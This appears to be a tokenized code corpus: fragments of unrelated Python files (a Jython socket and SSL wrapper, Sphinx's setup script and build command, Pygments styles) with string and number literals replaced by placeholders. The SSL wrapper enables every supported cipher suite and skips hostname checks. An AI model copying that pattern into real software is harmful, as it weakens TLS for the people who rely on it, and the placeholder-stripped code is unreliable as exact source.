self . _get_wbuf_len ( ) >= self . _wbufsize ) : <EOL> self . flush ( ) <EOL> def _get_wbuf_len ( self ) : <EOL> buf_len = <NUM_LIT:0> <EOL> for x in self . _wbuf : <EOL> buf_len += len ( x ) <EOL> return buf_len <EOL> def read ( self , size = - <NUM_LIT:1> ) : <EOL> data = self . _rbuf <EOL> if size < <NUM_LIT:0> : <EOL> buffers = [ ] <EOL> if data : <EOL> buffers . append ( data ) <EOL> self . _rbuf = "<STR_LIT>" <EOL> if self . _rbufsize <= <NUM_LIT:1> : <EOL> recv_size = self . default_bufsize <EOL> else : <EOL> recv_size = self . _rbufsize <EOL> while True : <EOL> data = self . _sock . recv ( recv_size ) <EOL> if not data : <EOL> break <EOL> buffers . append ( data ) <EOL> return "<STR_LIT>" . join ( buffers ) <EOL> else : <EOL> buf_len = len ( data ) <EOL> if buf_len >= size : <EOL> self . _rbuf = data [ size : ] <EOL> return data [ : size ] <EOL> buffers = [ ] <EOL> if data : <EOL> buffers . append ( data ) <EOL> self . _rbuf = "<STR_LIT>" <EOL> while True : <EOL> left = size - buf_len <EOL> recv_size = max ( self . _rbufsize , left ) <EOL> data = self . _sock . recv ( recv_size ) <EOL> if not data : <EOL> break <EOL> buffers . append ( data ) <EOL> n = len ( data ) <EOL> if n >= left : <EOL> self . _rbuf = data [ left : ] <EOL> buffers [ - <NUM_LIT:1> ] = data [ : left ] <EOL> break <EOL> buf_len += n <EOL> return "<STR_LIT>" . join ( buffers ) <EOL> def readline ( self , size = - <NUM_LIT:1> ) : <EOL> data = self . _rbuf <EOL> if size < <NUM_LIT:0> : <EOL> if self . _rbufsize <= <NUM_LIT:1> : <EOL> assert data == "<STR_LIT>" <EOL> buffers = [ ] <EOL> recv = self . _sock . recv <EOL> while data != "<STR_LIT:\n>" : <EOL> data = recv ( <NUM_LIT:1> ) <EOL> if not data : <EOL> break <EOL> buffers . append ( data ) <EOL> return "<STR_LIT>" . join ( buffers ) <EOL> nl = data . find ( '<STR_LIT:\n>' ) <EOL> if nl >= <NUM_LIT:0> : <EOL> nl += <NUM_LIT:1> <EOL> self . _rbuf = data [ nl : ] <EOL> return data [ : nl ] <EOL> buffers = [ ] <EOL> if data : <EOL> buffers . append ( data ) <EOL> self . _rbuf = "<STR_LIT>" <EOL> while True : <EOL> data = self . _sock . recv ( self . _rbufsize ) <EOL> if not data : <EOL> break <EOL> buffers . append ( data ) <EOL> nl = data . find ( '<STR_LIT:\n>' ) <EOL> if nl >= <NUM_LIT:0> : <EOL> nl += <NUM_LIT:1> <EOL> self . _rbuf = data [ nl : ] <EOL> buffers [ - <NUM_LIT:1> ] = data [ : nl ] <EOL> break <EOL> return "<STR_LIT>" . join ( buffers ) <EOL> else : <EOL> nl = data . find ( '<STR_LIT:\n>' , <NUM_LIT:0> , size ) <EOL> if nl >= <NUM_LIT:0> : <EOL> nl += <NUM_LIT:1> <EOL> self . _rbuf = data [ nl : ] <EOL> return data [ : nl ] <EOL> buf_len = len ( data ) <EOL> if buf_len >= size : <EOL> self . _rbuf = data [ size : ] <EOL> return data [ : size ] <EOL> buffers = [ ] <EOL> if data : <EOL> buffers . append ( data ) <EOL> self . _rbuf = "<STR_LIT>" <EOL> while True : <EOL> data = self . _sock . recv ( self . _rbufsize ) <EOL> if not data : <EOL> break <EOL> buffers . append ( data ) <EOL> left = size - buf_len <EOL> nl = data . find ( '<STR_LIT:\n>' , <NUM_LIT:0> , left ) <EOL> if nl >= <NUM_LIT:0> : <EOL> nl += <NUM_LIT:1> <EOL> self . _rbuf = data [ nl : ] <EOL> buffers [ - <NUM_LIT:1> ] = data [ : nl ] <EOL> break <EOL> n = len ( data ) <EOL> if n >= left : <EOL> self . _rbuf = data [ left : ] <EOL> buffers [ - <NUM_LIT:1> ] = data [ : left ] <EOL> break <EOL> buf_len += n <EOL> return "<STR_LIT>" . join ( buffers ) <EOL> def readlines ( self , sizehint = <NUM_LIT:0> ) : <EOL> total = <NUM_LIT:0> <EOL> list = [ ] <EOL> while True : <EOL> line = self . readline ( ) <EOL> if not line : <EOL> break <EOL> list . append ( line ) <EOL> total += len ( line ) <EOL> if sizehint and total >= sizehint : <EOL> break <EOL> return list <EOL> def __iter__ ( self ) : <EOL> return self <EOL> def next ( self ) : <EOL> line = self . readline ( ) <EOL> if not line : <EOL> raise StopIteration <EOL> return line <EOL> class ssl : <EOL> def __init__ ( self , plain_sock , keyfile = None , certfile = None ) : <EOL> try : <EOL> self . ssl_sock = self . _make_ssl_socket ( plain_sock ) <EOL> self . _in_buf = java . io . BufferedInputStream ( self . ssl_sock . getInputStream ( ) ) <EOL> self . _out_buf = java . io . BufferedOutputStream ( self . ssl_sock . getOutputStream ( ) ) <EOL> except java . lang . Exception , jlx : <EOL> raise _map_exception ( jlx ) <EOL> def _make_ssl_socket ( self , plain_socket , auto_close = <NUM_LIT:0> ) : <EOL> java_net_socket = plain_socket . _get_jsocket ( ) <EOL> assert isinstance ( java_net_socket , java . net . Socket ) <EOL> host = java_net_socket . getInetAddress ( ) . getHostAddress ( ) <EOL> port = java_net_socket . getPort ( ) <EOL> factory = javax . net . ssl . SSLSocketFactory . getDefault ( ) ; <EOL> ssl_socket = factory . createSocket ( java_net_socket , host , port , auto_close ) <EOL> ssl_socket . setEnabledCipherSuites ( ssl_socket . getSupportedCipherSuites ( ) ) <EOL> ssl_socket . startHandshake ( ) <EOL> return ssl_socket <EOL> def read ( self , n = <NUM_LIT> ) : <EOL> try : <EOL> data = jarray . zeros ( n , '<STR_LIT:b>' ) <EOL> m = self . _in_buf . read ( data , <NUM_LIT:0> , n ) <EOL> if m <= <NUM_LIT:0> : <EOL> return "<STR_LIT>" <EOL> if m < n : <EOL> data = data [ : m ] <EOL> return data . tostring ( ) <EOL> except java . lang . Exception , jlx : <EOL> raise _map_exception ( jlx ) <EOL> def write ( self , s ) : <EOL> try : <EOL> self . _out_buf . write ( s ) <EOL> self . _out_buf . flush ( ) <EOL> return len ( s ) <EOL> except java . lang . Exception , jlx : <EOL> raise _map_exception ( jlx ) <EOL> def _get_server_cert ( self ) : <EOL> try : <EOL> return self . ssl_sock . getSession ( ) . getPeerCertificates ( ) [ <NUM_LIT:0> ] <EOL> except java . lang . Exception , jlx : <EOL> raise _map_exception ( jlx ) <EOL> def server ( self ) : <EOL> cert = self . _get_server_cert ( ) <EOL> return cert . getSubjectDN ( ) . toString ( ) <EOL> def issuer ( self ) : <EOL> cert = self . _get_server_cert ( ) <EOL> return cert . getIssuerDN ( ) . toString ( ) <EOL> _realssl = ssl <EOL> def ssl ( sock , keyfile = None , certfile = None ) : <EOL> if hasattr ( sock , "<STR_LIT>" ) : <EOL> sock = sock . _sock <EOL> return _realssl ( sock , keyfile , certfile ) <EOL> def test ( ) : <EOL> s = socket ( AF_INET , SOCK_STREAM ) <EOL> s . connect ( ( "<STR_LIT>" , <NUM_LIT> ) ) <EOL> s . send ( "<STR_LIT>" ) <EOL> while <NUM_LIT:1> : <EOL> data = s . recv ( <NUM_LIT> ) <EOL> print data <EOL> if not data : <EOL> break <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> test ( ) </s>
<s> class ConfigError ( Exception ) : <EOL> pass <EOL> class NotLoggedInError ( Exception ) : <EOL> pass <EOL> class ObjectNotFoundError ( Exception ) : <EOL> pass <EOL> class TaskFailedError ( Exception ) : <EOL> pass <EOL> class TemplateNotFoundError ( Exception ) : <EOL> pass <EOL> class NotImplementedError ( Exception ) : <EOL> pass </s>
<s> import os <EOL> import sys <EOL> def get_config ( env_var , default ) : <EOL> """<STR_LIT>""" <EOL> if env_var is not None : <EOL> value = os . environ . get ( env_var , None ) <EOL> if value is not None : <EOL> return value <EOL> return default <EOL> if getattr ( sys , "<STR_LIT>" , None ) : <EOL> DIST_MODULE_PATH = os . path . join ( sys . prefix , '<STR_LIT>' ) <EOL> else : <EOL> DIST_MODULE_PATH = '<STR_LIT>' <EOL> DEFAULT_MODULE_PATH = get_config ( '<STR_LIT>' , os . path . join ( DIST_MODULE_PATH , '<STR_LIT>' ) ) <EOL> DEFAULT_HOST_LIST = os . path . expanduser ( get_config ( '<STR_LIT>' , os . path . join ( DIST_MODULE_PATH , '<STR_LIT>' , '<STR_LIT>' ) ) ) <EOL> DEFAULT_PLAYBOOK = os . path . expanduser ( get_config ( '<STR_LIT>' , os . path . join ( DIST_MODULE_PATH , '<STR_LIT>' , '<STR_LIT>' ) ) ) <EOL> DEFAULT_CALLBACK_PLUGIN_PATH = os . path . expanduser ( get_config ( '<STR_LIT>' , os . path . join ( DIST_MODULE_PATH , '<STR_LIT>' ) ) ) <EOL> DEFAULT_SUDO_FLAGS = get_config ( '<STR_LIT>' , '<STR_LIT>' ) </s>
<s> from setuptools import setup , find_packages <EOL> import os <EOL> import sys <EOL> from distutils import log <EOL> import sphinx <EOL> long_desc = '''<STR_LIT>''' <EOL> if sys . version_info < ( <NUM_LIT:2> , <NUM_LIT:6> ) or ( <NUM_LIT:3> , <NUM_LIT:0> ) <= sys . version_info < ( <NUM_LIT:3> , <NUM_LIT:3> ) : <EOL> print ( '<STR_LIT>' ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> requires = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> extras_require = { <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> '<STR_LIT:test>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> } <EOL> if sys . platform == '<STR_LIT:win32>' : <EOL> requires . append ( '<STR_LIT>' ) <EOL> cmdclass = { } <EOL> try : <EOL> from babel . messages . pofile import read_po <EOL> from babel . messages . frontend import compile_catalog <EOL> try : <EOL> from simplejson import dump <EOL> except ImportError : <EOL> from json import dump <EOL> except ImportError : <EOL> pass <EOL> else : <EOL> class compile_catalog_plusjs ( compile_catalog ) : <EOL> """<STR_LIT>""" <EOL> def run ( self ) : <EOL> compile_catalog . run ( self ) <EOL> po_files = [ ] <EOL> js_files = [ ] <EOL> if not self . input_file : <EOL> if self . locale : <EOL> po_files . append ( ( self . locale , <EOL> os . path . join ( self . directory , self . locale , <EOL> '<STR_LIT>' , <EOL> self . domain + '<STR_LIT>' ) ) ) <EOL> js_files . append ( os . path . join ( self . directory , self . locale , <EOL> '<STR_LIT>' , <EOL> self . domain + '<STR_LIT>' ) ) <EOL> else : <EOL> for locale in os . listdir ( self . directory ) : <EOL> po_file = os . path . join ( self . directory , locale , <EOL> '<STR_LIT>' , <EOL> self . domain + '<STR_LIT>' ) <EOL> if os . path . exists ( po_file ) : <EOL> po_files . append ( ( locale , po_file ) ) <EOL> js_files . append ( os . path . join ( self . directory , locale , <EOL> '<STR_LIT>' , <EOL> self . domain + '<STR_LIT>' ) ) <EOL> else : <EOL> po_files . append ( ( self . locale , self . input_file ) ) <EOL> if self . output_file : <EOL> js_files . append ( self . output_file ) <EOL> else : <EOL> js_files . append ( os . path . join ( self . directory , self . locale , <EOL> '<STR_LIT>' , <EOL> self . domain + '<STR_LIT>' ) ) <EOL> for js_file , ( locale , po_file ) in zip ( js_files , po_files ) : <EOL> infile = open ( po_file , '<STR_LIT:r>' ) <EOL> try : <EOL> catalog = read_po ( infile , locale ) <EOL> finally : <EOL> infile . close ( ) <EOL> if catalog . fuzzy and not self . use_fuzzy : <EOL> continue <EOL> log . info ( '<STR_LIT>' , <EOL> po_file , js_file ) <EOL> jscatalog = { } <EOL> for message in catalog : <EOL> if any ( x [ <NUM_LIT:0> ] . endswith ( ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> for x in message . locations ) : <EOL> msgid = message . id <EOL> if isinstance ( msgid , ( list , tuple ) ) : <EOL> msgid = msgid [ <NUM_LIT:0> ] <EOL> jscatalog [ msgid ] = message . string <EOL> outfile = open ( js_file , '<STR_LIT:wb>' ) <EOL> try : <EOL> outfile . write ( '<STR_LIT>' ) <EOL> dump ( dict ( <EOL> messages = jscatalog , <EOL> plural_expr = catalog . plural_expr , <EOL> locale = str ( catalog . locale ) <EOL> ) , outfile , sort_keys = True ) <EOL> outfile . write ( '<STR_LIT>' ) <EOL> finally : <EOL> outfile . close ( ) <EOL> cmdclass [ '<STR_LIT>' ] = compile_catalog_plusjs <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = sphinx . __version__ , <EOL> url = '<STR_LIT>' , <EOL> download_url = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> long_description = long_desc , <EOL> zip_safe = False , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> platforms = '<STR_LIT>' , <EOL> packages = find_packages ( exclude = [ '<STR_LIT>' ] ) , <EOL> include_package_data = True , <EOL> entry_points = { <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> ] , <EOL> } , <EOL> install_requires = requires , <EOL> extras_require = extras_require , <EOL> cmdclass = cmdclass , <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function <EOL> import sys <EOL> import optparse <EOL> import traceback <EOL> from os import path <EOL> from six import text_type , binary_type <EOL> from docutils . utils import SystemMessage <EOL> from sphinx import __display_version__ <EOL> from sphinx . errors import SphinxError <EOL> from sphinx . application import Sphinx <EOL> from sphinx . util import Tee , format_exception_cut_frames , save_traceback <EOL> from sphinx . util . console import red , nocolor , color_terminal <EOL> from sphinx . util . osutil import abspath , fs_encoding <EOL> from sphinx . util . pycompat import terminal_safe <EOL> USAGE = """<STR_LIT>""" % __display_version__ <EOL> EPILOG = """<STR_LIT>""" <EOL> class MyFormatter ( optparse . IndentedHelpFormatter ) : <EOL> def format_usage ( self , usage ) : <EOL> return usage <EOL> def format_help ( self , formatter ) : <EOL> result = [ ] <EOL> if self . description : <EOL> result . append ( self . format_description ( formatter ) ) <EOL> if self . option_list : <EOL> result . append ( self . format_option_help ( formatter ) ) <EOL> return "<STR_LIT:\n>" . join ( result ) <EOL> def main ( argv ) : <EOL> if not color_terminal ( ) : <EOL> nocolor ( ) <EOL> parser = optparse . OptionParser ( USAGE , epilog = EPILOG , formatter = MyFormatter ( ) ) <EOL> parser . add_option ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , dest = '<STR_LIT:version>' , <EOL> help = '<STR_LIT>' ) <EOL> group = parser . add_option_group ( '<STR_LIT>' ) <EOL> group . add_option ( '<STR_LIT>' , metavar = '<STR_LIT>' , dest = '<STR_LIT>' , default = '<STR_LIT:html>' , <EOL> help = '<STR_LIT>' ) <EOL> group . add_option ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , dest = '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> group . add_option ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , dest = '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> group . add_option ( '<STR_LIT>' , metavar = '<STR_LIT>' , default = None , dest = '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> group . add_option ( '<STR_LIT>' , metavar = '<STR_LIT:N>' , default = <NUM_LIT:1> , type = '<STR_LIT:int>' , dest = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> group = parser . add_option_group ( '<STR_LIT>' ) <EOL> group . add_option ( '<STR_LIT:-c>' , metavar = '<STR_LIT>' , dest = '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> group . add_option ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , dest = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> group . add_option ( '<STR_LIT>' , metavar = '<STR_LIT>' , action = '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , default = [ ] , <EOL> help = '<STR_LIT>' ) <EOL> group . add_option ( '<STR_LIT>' , metavar = '<STR_LIT>' , action = '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , default = [ ] , <EOL> help = '<STR_LIT>' ) <EOL> group . add_option ( '<STR_LIT>' , metavar = '<STR_LIT>' , action = '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , default = [ ] , <EOL> help = '<STR_LIT>' ) <EOL> group . add_option ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , dest = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> group = parser . add_option_group ( '<STR_LIT>' ) <EOL> group . add_option ( '<STR_LIT>' , action = '<STR_LIT:count>' , dest = '<STR_LIT>' , default = <NUM_LIT:0> , <EOL> help = '<STR_LIT>' ) <EOL> group . add_option ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , dest = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> group . add_option ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , dest = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> group . add_option ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , dest = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> group . add_option ( '<STR_LIT>' , metavar = '<STR_LIT>' , dest = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> group . add_option ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , dest = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> group . add_option ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , dest = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> group . add_option ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , dest = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> try : <EOL> opts , args = parser . parse_args ( list ( argv [ <NUM_LIT:1> : ] ) ) <EOL> except SystemExit as err : <EOL> return err . code <EOL> if opts . version : <EOL> print ( '<STR_LIT>' % __display_version__ ) <EOL> return <NUM_LIT:0> <EOL> try : <EOL> srcdir = abspath ( args [ <NUM_LIT:0> ] ) <EOL> confdir = abspath ( opts . confdir or srcdir ) <EOL> if opts . noconfig : <EOL> confdir = None <EOL> if not path . isdir ( srcdir ) : <EOL> print ( '<STR_LIT>' % srcdir , <EOL> file = sys . stderr ) <EOL> return <NUM_LIT:1> <EOL> if not opts . noconfig and not path . isfile ( path . join ( confdir , '<STR_LIT>' ) ) : <EOL> print ( '<STR_LIT>' , <EOL> file = sys . stderr ) <EOL> return <NUM_LIT:1> <EOL> outdir = abspath ( args [ <NUM_LIT:1> ] ) <EOL> if srcdir == outdir : <EOL> print ( '<STR_LIT>' , <EOL> file = sys . stderr ) <EOL> return <NUM_LIT:1> <EOL> except IndexError : <EOL> parser . print_help ( ) <EOL> return <NUM_LIT:1> <EOL> except UnicodeError : <EOL> print ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % fs_encoding , file = sys . stderr ) <EOL> return <NUM_LIT:1> <EOL> filenames = args [ <NUM_LIT:2> : ] <EOL> err = <NUM_LIT:0> <EOL> for filename in filenames : <EOL> if not path . isfile ( filename ) : <EOL> print ( '<STR_LIT>' % filename , file = sys . stderr ) <EOL> err = <NUM_LIT:1> <EOL> if err : <EOL> return <NUM_LIT:1> <EOL> try : <EOL> locale = __import__ ( '<STR_LIT>' ) <EOL> likely_encoding = locale . getpreferredencoding ( ) <EOL> except Exception : <EOL> likely_encoding = None <EOL> if opts . force_all and filenames : <EOL> print ( '<STR_LIT>' , file = sys . stderr ) <EOL> return <NUM_LIT:1> <EOL> if opts . nocolor : <EOL> nocolor ( ) <EOL> doctreedir = abspath ( opts . doctreedir or path . join ( outdir , '<STR_LIT>' ) ) <EOL> status = sys . stdout <EOL> warning = sys . stderr <EOL> error = sys . stderr <EOL> if opts . quiet : <EOL> status = None <EOL> if opts . really_quiet : <EOL> status = warning = None <EOL> if warning and opts . warnfile : <EOL> try : <EOL> warnfp = open ( opts . warnfile , '<STR_LIT:w>' ) <EOL> except Exception as exc : <EOL> print ( '<STR_LIT>' % <EOL> ( opts . warnfile , exc ) , file = sys . stderr ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> warning = Tee ( warning , warnfp ) <EOL> error = warning <EOL> confoverrides = { } <EOL> for val in opts . define : <EOL> try : <EOL> key , val = val . split ( '<STR_LIT:=>' ) <EOL> except ValueError : <EOL> print ( '<STR_LIT>' , <EOL> file = sys . stderr ) <EOL> return <NUM_LIT:1> <EOL> if likely_encoding and isinstance ( val , binary_type ) : <EOL> try : <EOL> val = val . decode ( likely_encoding ) <EOL> except UnicodeError : <EOL> pass <EOL> confoverrides [ key ] = val <EOL> for val in opts . htmldefine : <EOL> try : <EOL> key , val = val . split ( '<STR_LIT:=>' ) <EOL> except ValueError : <EOL> print ( '<STR_LIT>' , <EOL> file = sys . stderr ) <EOL> return <NUM_LIT:1> <EOL> try : <EOL> val = int ( val ) <EOL> except ValueError : <EOL> if likely_encoding and isinstance ( val , binary_type ) : <EOL> try : <EOL> val = val . decode ( likely_encoding ) <EOL> except UnicodeError : <EOL> pass <EOL> confoverrides [ '<STR_LIT>' % key ] = val <EOL> if opts . nitpicky : <EOL> confoverrides [ '<STR_LIT>' ] = True <EOL> app = None <EOL> try : <EOL> app = Sphinx ( srcdir , confdir , outdir , doctreedir , opts . builder , <EOL> confoverrides , status , warning , opts . freshenv , <EOL> opts . warningiserror , opts . tags , opts . verbosity , opts . jobs ) <EOL> app . build ( opts . force_all , filenames ) <EOL> return app . statuscode <EOL> except ( Exception , KeyboardInterrupt ) as err : <EOL> if opts . pdb : <EOL> import pdb <EOL> print ( red ( '<STR_LIT>' ) , <EOL> file = error ) <EOL> traceback . print_exc ( ) <EOL> pdb . post_mortem ( sys . exc_info ( ) [ <NUM_LIT:2> ] ) <EOL> else : <EOL> print ( file = error ) <EOL> if opts . verbosity or opts . traceback : <EOL> traceback . print_exc ( None , error ) <EOL> print ( file = error ) <EOL> if isinstance ( err , KeyboardInterrupt ) : <EOL> print ( '<STR_LIT>' , file = error ) <EOL> elif isinstance ( err , SystemMessage ) : <EOL> print ( red ( '<STR_LIT>' ) , file = error ) <EOL> print ( terminal_safe ( err . args [ <NUM_LIT:0> ] ) , file = error ) <EOL> elif isinstance ( err , SphinxError ) : <EOL> print ( red ( '<STR_LIT>' % err . category ) , file = error ) <EOL> print ( terminal_safe ( text_type ( err ) ) , file = error ) <EOL> elif isinstance ( err , UnicodeError ) : <EOL> print ( red ( '<STR_LIT>' ) , file = error ) <EOL> print ( terminal_safe ( text_type ( err ) ) , file = error ) <EOL> tbpath = save_traceback ( app ) <EOL> print ( red ( '<STR_LIT>' <EOL> '<STR_LIT>' % tbpath ) , <EOL> file = error ) <EOL> elif isinstance ( err , RuntimeError ) and '<STR_LIT>' in str ( err ) : <EOL> print ( red ( '<STR_LIT>' ) , file = error ) <EOL> print ( terminal_safe ( text_type ( err ) ) , file = error ) <EOL> print ( file = error ) <EOL> print ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , file = error ) <EOL> print ( '<STR_LIT>' , file = error ) <EOL> else : <EOL> print ( red ( '<STR_LIT>' ) , file = error ) <EOL> print ( format_exception_cut_frames ( ) . rstrip ( ) , file = error ) <EOL> tbpath = save_traceback ( app ) <EOL> print ( red ( '<STR_LIT>' <EOL> '<STR_LIT>' % tbpath ) , <EOL> file = error ) <EOL> print ( '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> file = error ) <EOL> print ( '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> file = error ) <EOL> return <NUM_LIT:1> </s>
<s> """<STR_LIT>""" <EOL> from pygments . style import Style <EOL> from pygments . styles . friendly import FriendlyStyle <EOL> from pygments . token import Generic , Comment , Number , Whitespace , Keyword , Operator , Name , String , Error <EOL> class NoneStyle ( Style ) : <EOL> """<STR_LIT>""" <EOL> class SphinxStyle ( Style ) : <EOL> """<STR_LIT>""" <EOL> background_color = '<STR_LIT>' <EOL> default_style = '<STR_LIT>' <EOL> styles = FriendlyStyle . styles <EOL> styles . update ( { <EOL> Generic . Output : '<STR_LIT>' , <EOL> Comment : '<STR_LIT>' , <EOL> Number : '<STR_LIT>' , <EOL> } ) <EOL> class PyramidStyle ( Style ) : <EOL> """<STR_LIT>""" <EOL> background_color = "<STR_LIT>" <EOL> default_style = "<STR_LIT>" <EOL> styles = { <EOL> Whitespace : "<STR_LIT>" , <EOL> Comment : "<STR_LIT>" , <EOL> Comment . Preproc : "<STR_LIT>" , <EOL> Comment . Special : "<STR_LIT>" , <EOL> Keyword : "<STR_LIT>" , <EOL> Keyword . Pseudo : "<STR_LIT>" , <EOL> Keyword . Type : "<STR_LIT>" , <EOL> Operator : "<STR_LIT>" , <EOL> Operator . Word : "<STR_LIT>" , <EOL> Name . Builtin : "<STR_LIT>" , <EOL> Name . Function : "<STR_LIT>" , <EOL> Name . Class : "<STR_LIT>" , <EOL> Name . Namespace : "<STR_LIT>" , <EOL> Name . Exception : "<STR_LIT>" , <EOL> Name . Variable : "<STR_LIT>" , <EOL> Name . Constant : "<STR_LIT>" , <EOL> Name . Label : "<STR_LIT>" , <EOL> Name . Entity : "<STR_LIT>" , <EOL> Name . Attribute : "<STR_LIT>" , <EOL> Name . Tag : "<STR_LIT>" , <EOL> Name . Decorator : "<STR_LIT>" , <EOL> String : "<STR_LIT>" , <EOL> String . Doc : "<STR_LIT>" , <EOL> String . Interpol : "<STR_LIT>" , <EOL> String . Escape : "<STR_LIT>" , <EOL> String . Regex : "<STR_LIT>" , <EOL> String . Symbol : "<STR_LIT>" , <EOL> String . Other : "<STR_LIT>" , <EOL> Number : "<STR_LIT>" , <EOL> Generic . Heading : "<STR_LIT>" , <EOL> Generic . Subheading : "<STR_LIT>" , <EOL> Generic . Deleted : "<STR_LIT>" , <EOL> Generic . Inserted : "<STR_LIT>" , <EOL> Generic . Error : "<STR_LIT>" , <EOL> Generic . Emph : "<STR_LIT>" , <EOL> Generic . Strong : "<STR_LIT>" , <EOL> Generic . Prompt : "<STR_LIT>" , <EOL> Generic . Output : "<STR_LIT>" , <EOL> Generic . Traceback : "<STR_LIT>" , <EOL> Error : "<STR_LIT>" <EOL> } </s>
<s> """<STR_LIT>""" <EOL> from docutils import nodes <EOL> from sphinx import addnodes <EOL> def _is_single_paragraph ( node ) : <EOL> """<STR_LIT>""" <EOL> if len ( node ) == <NUM_LIT:0> : <EOL> return False <EOL> elif len ( node ) > <NUM_LIT:1> : <EOL> for subnode in node [ <NUM_LIT:1> : ] : <EOL> if not isinstance ( subnode , nodes . system_message ) : <EOL> return False <EOL> if isinstance ( node [ <NUM_LIT:0> ] , nodes . paragraph ) : <EOL> return True <EOL> return False <EOL> class Field ( object ) : <EOL> """<STR_LIT>""" <EOL> is_grouped = False <EOL> is_typed = False <EOL> def __init__ ( self , name , names = ( ) , label = None , has_arg = True , rolename = None , <EOL> bodyrolename = None ) : <EOL> self . name = name <EOL> self . names = names <EOL> self . label = label <EOL> self . has_arg = has_arg <EOL> self . rolename = rolename <EOL> self . bodyrolename = bodyrolename <EOL> def make_xref ( self , rolename , domain , target , <EOL> innernode = addnodes . literal_emphasis , contnode = None ) : <EOL> if not rolename : <EOL> return contnode or innernode ( target , target ) <EOL> refnode = addnodes . pending_xref ( '<STR_LIT>' , refdomain = domain , refexplicit = False , <EOL> reftype = rolename , reftarget = target ) <EOL> refnode += contnode or innernode ( target , target ) <EOL> return refnode <EOL> def make_entry ( self , fieldarg , content ) : <EOL> return ( fieldarg , content ) <EOL> def make_field ( self , types , domain , item ) : <EOL> fieldarg , content = item <EOL> fieldname = nodes . field_name ( '<STR_LIT>' , self . label ) <EOL> if fieldarg : <EOL> fieldname += nodes . Text ( '<STR_LIT:U+0020>' ) <EOL> fieldname += self . make_xref ( self . rolename , domain , <EOL> fieldarg , nodes . Text ) <EOL> if len ( content ) == <NUM_LIT:1> and ( <EOL> isinstance ( content [ <NUM_LIT:0> ] , nodes . Text ) or <EOL> ( isinstance ( content [ <NUM_LIT:0> ] , nodes . inline ) and len ( content [ <NUM_LIT:0> ] ) == <NUM_LIT:1> and <EOL> isinstance ( content [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] , nodes . Text ) ) ) : <EOL> content = [ self . make_xref ( self . bodyrolename , domain , <EOL> content [ <NUM_LIT:0> ] . astext ( ) , contnode = content [ <NUM_LIT:0> ] ) ] <EOL> fieldbody = nodes . field_body ( '<STR_LIT>' , nodes . paragraph ( '<STR_LIT>' , '<STR_LIT>' , * content ) ) <EOL> return nodes . field ( '<STR_LIT>' , fieldname , fieldbody ) <EOL> class GroupedField ( Field ) : <EOL> """<STR_LIT>""" 